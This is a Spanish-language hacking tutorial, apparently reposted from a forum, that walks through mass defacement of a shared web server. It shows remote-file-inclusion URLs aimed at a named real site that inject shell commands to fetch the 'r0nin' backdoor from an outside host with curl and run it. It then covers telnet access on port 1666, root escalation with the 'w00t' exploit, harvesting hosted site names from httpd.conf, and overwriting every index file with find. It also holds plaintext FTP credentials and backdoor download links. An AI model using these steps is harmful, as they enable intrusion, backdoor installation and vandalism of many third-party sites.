Se puede descargar usando wget , curl o lynx
El putty version que anda: putty-0.53b-installer.exe
http://www.karass.nu/htmltonuke.php?filnavn=ftp://mygaropa_garopa:lololo@mygaropa.awardspace.us/mygaropa.awardspace.us/exploit.htm&cmd=cd%20/tmp/;mkdir hola;ls;

http://www.karass.nu/htmltonuke.php?filnavn=ftp://mygaropa_garopa:lololo@mygaropa.awardspace.us/mygaropa.awardspace.us/exploit.htm&cmd=cd%20/tmp/;chmod -c 777 hola;ls;

http://www.karass.nu/htmltonuke.php?filnavn=ftp://mygaropa_garopa:lololo@mygaropa.awardspace.us/mygaropa.awardspace.us/exploit.htm&cmd=cd%20/tmp/hola;ls;curl%20-o%20r0nin.zip%20http://www.consultorioinformatico.net/r0nin.zip;ls;

http://www.karass.nu/htmltonuke.php?filnavn=ftp://mygaropa_garopa:lololo@mygaropa.awardspace.us/mygaropa.awardspace.us/exploit.htm&cmd=cd%20/tmp/hola;ls;unzip%20r0nin.zip;ls;



http://www.karass.nu/htmltonuke.php?filnavn=ftp://mygaropa_garopa:lololo@mygaropa.awardspace.us/mygaropa.awardspace.us/exploit.htm&cmd=cd%20/tmp/hola/;ls;chmod%20-c%20777%20./r0nin;./r0nin;


Una ves adentro del server sabiendo ya que se abrio el puerto me
conecto con el putty.
IP: ip de la web con ping
Port: 1666
Method: TELNET

Pero si no es asi usaremos

find / -name httpd.conf

ia ke lo encontramos guardaremos su contenido en un .txt con el siguiente
comando

cat /etc/httpd/conf/httpd.conf | grep ServerName >/tmp/webs.txt

(se preguntaran para que hacemos eso , es para saber la configuración del
servidor y los sitios ke tiene)


Creo un index.php y un html que diga Hacked lo meto un zip y lo descargo.
Lo descomprimo.

Hay q dar siempre persismos a hola antes q todo.

Chmod 777 hola;


y tambien al backdoor

Chmod 777 r0nin; ./r0nin



curl -o defaced.zip http://www.geocities.com/defaced.zip

unzip defaced.zip

o sino curl -o index.html http://mygaropa.awardspace.us/index.html


MANERAS DEFACED

find / -name "index.*" -exec cp /tmp/hola/index.html {} \

find / -name "index.*" -exec cp /tmp/hola/index.html {} \



find / -name "index.*" -exec cp /tmp/ lol.html {} \;

cp archivo directorio

rm borrar archivo



LINK QUE USE:

metodo curl

http://www.mrbass.org/linux/

comprimir empaquetar linux

http://www.badopi.org/node/861

Ronin Problema

http://foro.elhacker.net/index.php/topic,78617.0.html

DEFACED MASSMENTE TODO
http://foro.el-hacker.com/index.php/topic,48902.0.html


Pity configuracion

http://www.aemilius.net/soporte/manuales/acceso-ssh-ssl-secure-shell-telnet-PuTTY.html

Ronin y woot

http://foro.portalhacker.net/index.php/topic,12315.0.html


Ronin Otros:

http://216.16.246.85/~digital/foro/index.php?PHPSESSID=471e3a3f6c253415279fc69ab0cc430e&topic=359.0

R0nin.zip Backdoor

http://www.consultorioinformatico.net/r0nin.zip




EJEMPLO A WEB:



Bien tenemos nuestro backdoor listo para usar, ahora usaremos la siguiente
herramienta ?putty? este es un cliente muy bueno para telnet y ssh , lo abrimos
y en el campo de host pondremos la dirección ke atakaremos y seleccionamos la
opción telnet en el puerto 1666 ke es el puerto ke usa nuestro backdoor como lo ven en la siguiente imagen.

Después de esto nos saldrá una pantalla negra, lo cual significa ke nuestro
backdoor hizo conexión, ahora nos disponemos a ejecutar comandos, en este caso
no usare muchos, para empezar usare id, esto es para ver los permisos ke tenemos, como podemos ver en la imagen tenemos permisos

Código:
uid=48(apache) gid=48(apache) groups=48(apache)

los cuales cambiaremos por permisos de root , después de que nos conecto a telnet , subiremos nuestro xploit con el cual rotearemos el servidor , en mi caso usare el w00t , lo subiremos a el servidor usando wget y le daremos
permisos 777 y lo ejecutaremos como lo vemos en las siguientes imágenes:

Listo tenemos root , el siguiente paso sera buscar el archivo httpd.conf , por lo regular se encuentra en las carpetas

/etc/httpd/conf/httpd.conf

Pero si no es asi usaremos

find / -name httpd.conf

ia ke lo encontramos guardaremos su contenido en un .txt con el siguiente
comando

cat /etc/httpd/conf/httpd.conf | grep ServerName >/home/shito-ryu/public_html/webs.txt

(se preguntaran para que hacemos eso , es para saber la configuración del
servidor y los sitios ke tiene)

Sobre escribiendo index:

Después de haber sakado el httpd.conf y haber enlistado las webs vamos a sobreescribir todos los index de el servidor , primero tenemos ke subir un mirror el
cual sobreescribir los demás index , el mio en este casi se llama lol.html , lo pondré en la carpeta principal , después de eso pongo

find / -name "index.*" -exec cp /home/shito-ryu/public_html/lol.html {} \;

eso es en mi caso ia ke la carpeta public_html tenia permisos

pero puede ser también de estar forma

find / -name "index.*" -exec cp /tmp/ lol.html {} \;

o de donde se encuentre su mirror

Esto llevará algunos minutos si es ke son varios sitios , sabremos ke ha
terminado ia ke nos enviara de nuevo

Sh-2.05b# para ejecutar un comando

El final si revisamos los sitios aparecera su mirror en el index.

Autor: 0o_zeus_o0

Sitio: www.elitemexico.org

PD: Ponía en el manual "No modificar este tutorial", he tenido que hacerlo, primero por las 9000 faltas de ortografía y las que me he dejado por pereza.. y segundo porque no tiene copyright.


Saludos!